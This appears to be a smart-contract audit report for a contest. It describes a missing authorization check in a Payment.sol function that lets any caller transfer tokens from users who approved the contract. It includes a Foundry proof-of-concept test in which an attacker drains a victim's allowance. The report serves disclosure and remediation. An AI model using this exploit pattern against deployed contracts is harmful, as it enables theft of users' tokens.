Wobbly Red Lion

High

# Missing authorization checks in `Payment::payWithERC20` will cause complete loss of approved tokens for users

### Summary

Missing authorization checks in `Payment.sol` will cause complete loss of approved tokens for users as attackers can call `payWithERC20` to drain any approved allowances.



### Root Cause

In `Payment.sol` the `payWithERC20` function lacks authorization checks, allowing any caller to transfer tokens from arbitrary addresses:

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25

### Internal Pre-conditions

- User must have approved the Blueprint contract to spend their tokens

- Attacker must know about at least one address with active approvals

- Token contract must be ERC20 compliant



### External Pre-conditions

- No monitoring/revocation of suspicious token transfers

- Token contract doesn't implement callback approvals

### Attack Path

- Victim approves Blueprint contract to spend their tokens

- Attacker monitors blockchain for approval events
 
- Attacker calls payWithERC20 with victim's address as from parameter
 
- Contract transfers victim's tokens to attacker's address
 
- Attack repeats until victim's allowance is drained



### Impact

Approving users suffer 100% loss of approved token balances. Attacker gains all stolen tokens with minimal gas costs .

### PoC

put this code in your test folder 

```solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintCore.sol";
import "./MockERC20.sol";

contract PaymentVulnerabilityTest is Test {
    BlueprintCore blueprint;
    MockERC20 mockToken;
    
    // Test addresses
    address owner = address(0x1);
    address victim = address(0x2);
    address attacker = address(0x3);
    
    // Test amount
    uint256 approvalAmount = 1000 * 10**18; // 1000 tokens
    uint256 stolenAmount = 500 * 10**18;    // 500 tokens
    
    function setUp() public {
        // Deploy contracts
        blueprint = new BlueprintCore();
        mockToken = new MockERC20();
        
        // Setup victim with tokens and approvals
        mockToken.mint(victim, approvalAmount);
        
        vm.startPrank(victim);
        // Victim approves the blueprint contract to spend their tokens
        // This would typically happen when interacting with the contract legitimately
        mockToken.approve(address(blueprint), approvalAmount);
        vm.stopPrank();
    }
    
    function test_payWithERC20_unauthorized_transfer() public {
        // Verify victim's initial balance
        assertEq(mockToken.balanceOf(victim), approvalAmount, "Victim should have initial tokens");
        assertEq(mockToken.balanceOf(attacker), 0, "Attacker should have no tokens initially");
        
        // Verify the victim has approved the blueprint contract
        assertEq(mockToken.allowance(victim, address(blueprint)), approvalAmount, "Victim should have approved blueprint");
        
        console.log("Initial state verified - victim has tokens and has approved the contract");
        
        // Attacker calls payWithERC20 directly to steal tokens
        vm.startPrank(attacker);
        console.log("Attacker calling payWithERC20 to steal tokens...");
        
        // The attacker is able to transfer tokens from the victim to themselves
        // without being authorized to do so
        blueprint.payWithERC20(
            address(mockToken),    // token address
            stolenAmount,          // amount to steal
            victim,                // from the victim
            attacker               // to the attacker
        );
        vm.stopPrank();
        
        // Verify the theft was successful
        assertEq(mockToken.balanceOf(victim), approvalAmount - stolenAmount, "Victim should have lost tokens");
        assertEq(mockToken.balanceOf(attacker), stolenAmount, "Attacker should have gained tokens");
        
        console.log("Vulnerability confirmed - attacker stole tokens from victim without authorization");
    }
} 

```

### Mitigation

Add authorization check  or make the `payWithERC20` internal